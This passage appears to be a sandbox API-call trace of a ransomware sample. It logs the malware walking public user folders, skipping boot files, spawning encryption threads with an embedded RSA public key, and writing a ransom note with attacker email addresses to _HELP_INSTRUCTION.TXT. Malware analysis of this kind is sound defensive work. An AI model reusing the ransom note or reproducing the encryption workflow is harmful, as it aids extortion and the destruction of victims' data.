bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.268] lstrcpyW (in: lpString1=0x17be7c, lpString2="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" | out: lpString1="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX") returned="1758A0BD1A6F8CE6B3A600C11E90712E.XZZX" [0209.268] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf64 [0209.268] Sleep (dwMilliseconds=0x96) [0209.420] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0209.420] lstrcmpW (lpString1="37DA6C30402385B0E323002B44E969F8.XZZX", lpString2="..") returned 1 [0209.420] lstrcmpW (lpString1="37DA6C30402385B0E323002B44E969F8.XZZX", lpString2=".") returned 1 [0209.420] StrStrW (lpFirst="37DA6C30402385B0E323002B44E969F8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0209.420] StrStrW (lpFirst="37DA6C30402385B0E323002B44E969F8.XZZX", lpSrch="ntldr") returned 0x0 [0209.420] StrStrW (lpFirst="37DA6C30402385B0E323002B44E969F8.XZZX", lpSrch="NTLDR") returned 0x0 [0209.420] StrStrW (lpFirst="37DA6C30402385B0E323002B44E969F8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0209.420] StrStrW (lpFirst="37DA6C30402385B0E323002B44E969F8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0209.420] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0209.420] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") [0209.420] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.420] lstrcpyW (in: lpString1=0x17be7c, lpString2="37DA6C30402385B0E323002B44E969F8.XZZX" | out: lpString1="37DA6C30402385B0E323002B44E969F8.XZZX") returned="37DA6C30402385B0E323002B44E969F8.XZZX" [0209.420] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.420] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf68 [0209.421] Sleep (dwMilliseconds=0x96) [0209.576] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0209.576] lstrcmpW (lpString1="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpString2="..") returned 1 [0209.576] lstrcmpW (lpString1="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpString2=".") returned 1 [0209.576] StrStrW (lpFirst="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0209.576] StrStrW (lpFirst="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpSrch="ntldr") returned 0x0 [0209.576] StrStrW (lpFirst="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpSrch="NTLDR") returned 0x0 [0209.576] StrStrW (lpFirst="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0209.576] StrStrW (lpFirst="A308B77E2F1E65BB59ECACAE33534A03.XZZX", lpSrch="ntdetect.com") returned 0x0 [0209.576] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0209.576] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") [0209.576] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.576] lstrcpyW (in: lpString1=0x17be7c, lpString2="A308B77E2F1E65BB59ECACAE33534A03.XZZX" | out: lpString1="A308B77E2F1E65BB59ECACAE33534A03.XZZX") returned="A308B77E2F1E65BB59ECACAE33534A03.XZZX" [0209.576] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.576] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf6c [0209.577] Sleep (dwMilliseconds=0x96) [0209.732] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0209.732] lstrcmpW (lpString1="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpString2="..") returned 1 [0209.732] lstrcmpW (lpString1="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpString2=".") returned 1 [0209.732] StrStrW (lpFirst="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0209.732] StrStrW (lpFirst="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpSrch="ntldr") returned 0x0 [0209.732] StrStrW (lpFirst="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpSrch="NTLDR") returned 0x0 [0209.732] StrStrW (lpFirst="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0209.732] StrStrW (lpFirst="B2BABB8113BECBA807B8242F17F3AFF0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0209.732] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned 39 [0209.732] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") [0209.732] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.732] lstrcpyW (in: lpString1=0x17be7c, lpString2="B2BABB8113BECBA807B8242F17F3AFF0.XZZX" | out: lpString1="B2BABB8113BECBA807B8242F17F3AFF0.XZZX") returned="B2BABB8113BECBA807B8242F17F3AFF0.XZZX" [0209.732] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\") returned="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\" [0209.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf70 [0209.733] Sleep (dwMilliseconds=0x96) [0209.888] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0209.888] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0209.888] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0209.888] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0209.888] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0209.888] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0209.888] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0209.888] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Music\\Sample Music" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music") returned="C:\\Users\\Public\\Music\\Sample Music" [0209.888] lstrcatW (in: lpString1="C:\\Users\\Public\\Music\\Sample Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Music\\Sample Music\\*.*") returned="C:\\Users\\Public\\Music\\Sample Music\\*.*" [0209.888] SetErrorMode (uMode=0x1) returned 0x1 [0209.888] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Music\\Sample Music\\_HELP_INSTRUCTION.TXT") returned 56 [0209.888] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0209.888] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0209.888] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0xf74) returned 0x0 [0209.889] RegQueryValueExW (in: hKey=0xf74, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4368bb0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x4368bb0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0209.889] RegCloseKey (hKey=0xf74) returned 0x0 [0209.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0209.889] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0209.889] CreateFileW (lpFileName="C:\\Users\\Public\\Music\\Sample Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\music\\sample music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf74 [0209.889] CloseHandle (hObject=0xf74) returned 1 [0209.889] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\Sample Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0209.889] PathFindFileNameW (pszPath="C:\\Users\\Public\\Music\\Sample Music") returned="Sample Music" [0209.889] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Music" | out: lpString1="Sample Music") returned="Sample Music" [0209.889] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0209.889] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0209.889] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0209.889] SetErrorMode (uMode=0x1) returned 0x1 [0209.889] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0209.889] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0209.889] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0209.889] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\*.*" [0209.889] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0209.890] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures") returned="Pictures" [0209.890] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0209.890] StrStrW (lpFirst="4FE187580C1CEAECF1249FC21086CF34.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0209.890] StrStrW (lpFirst="4FE187580C1CEAECF1249FC21086CF34.XZZX", lpSrch="ntldr") returned 0x0 [0209.890] StrStrW (lpFirst="4FE187580C1CEAECF1249FC21086CF34.XZZX", lpSrch="NTLDR") returned 0x0 [0209.890] StrStrW (lpFirst="4FE187580C1CEAECF1249FC21086CF34.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0209.890] StrStrW (lpFirst="4FE187580C1CEAECF1249FC21086CF34.XZZX", lpSrch="ntdetect.com") returned 0x0 [0209.890] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\") returned 29 [0209.890] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\") [0209.890] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0209.890] lstrcpyW (in: lpString1=0x17cf1c, lpString2="4FE187580C1CEAECF1249FC21086CF34.XZZX" | out: lpString1="4FE187580C1CEAECF1249FC21086CF34.XZZX") returned="4FE187580C1CEAECF1249FC21086CF34.XZZX" [0209.890] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\" [0209.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf7c [0209.890] Sleep (dwMilliseconds=0x96) [0210.044] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0210.044] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0210.044] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0210.044] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0210.044] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0210.044] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0210.044] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 1 [0210.044] FindClose (in: hFindFile=0x4372438 | out: hFindFile=0x4372438) returned 0 [0210.044] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0210.044] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\*.*" [0210.044] SetErrorMode (uMode=0x1) returned 0x1 [0210.044] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Pictures\\_HELP_INSTRUCTION.TXT") returned 46 [0210.044] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0210.045] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0210.045] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0xf80) returned 0x0 [0210.045] RegQueryValueExW (in: hKey=0xf80, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4368de0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4368de0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0210.045] RegCloseKey (hKey=0xf80) returned 0x0 [0210.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0210.045] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0210.045] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf80 [0210.045] CloseHandle (hObject=0xf80) returned 1 [0210.045] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x4372438 [0210.045] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures") returned="Pictures" [0210.045] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Pictures" | out: lpString1="Pictures") returned="Pictures" [0210.045] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Pictures" | out: lpString1="C:\\Users\\Public\\Pictures") returned="C:\\Users\\Public\\Pictures" [0210.045] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\") returned="C:\\Users\\Public\\Pictures\\" [0210.045] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\", lpString2="Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0210.045] SetErrorMode (uMode=0x1) returned 0x1 [0210.045] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="C:\\Users\\Public\\Pictures\\Sample Pictures" [0210.045] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.045] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.045] lstrcatW (in: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*") returned="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*" [0210.045] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x43728b8 [0210.045] PathFindFileNameW (pszPath="C:\\Users\\Public\\Pictures\\Sample Pictures") returned="Sample Pictures" [0210.045] lstrcpyW (in: lpString1=0x17b644, lpString2="Sample Pictures" | out: lpString1="Sample Pictures") returned="Sample Pictures" [0210.045] StrStrW (lpFirst="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0210.045] StrStrW (lpFirst="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX", lpSrch="ntldr") returned 0x0 [0210.045] StrStrW (lpFirst="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX", lpSrch="NTLDR") returned 0x0 [0210.045] StrStrW (lpFirst="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0210.046] StrStrW (lpFirst="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0210.046] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0210.046] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0210.046] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- 